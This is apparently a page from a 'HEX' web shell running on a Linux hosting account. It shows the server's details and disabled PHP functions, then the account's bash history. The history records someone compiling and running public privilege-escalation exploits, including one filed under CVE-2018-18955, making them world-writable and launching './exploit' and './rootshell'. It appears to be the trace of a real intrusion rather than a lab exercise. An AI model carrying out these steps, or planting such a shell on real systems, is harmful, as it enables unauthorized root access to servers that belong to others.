HEX
Server: Apache
System: Linux host.exenss.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User: seniorsitjordan (1063)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/seniorsitjordan/.bash_history
ls
ls
chmod exploit 777
chmod 777 exploit
./exploit
cd Linux-Privilege-Escalation-Exploits
ls
cd 2018/CVE-2018-18955
ls
gcc -o exploit subuid_shell.c -lcap   # veya sadece gcc -o exploit *.c
ls
for file in *.c; do     gcc "$file" -o "${file%.c}"; done
ls
dnf groupinstall "Development Tools"
gcc --version   # kontrol
ls
ls
ls
ls
cd ..
,cd ..
ls
cd ..
ls
cd ..
ls
chmod 777 rootshell
./rootshell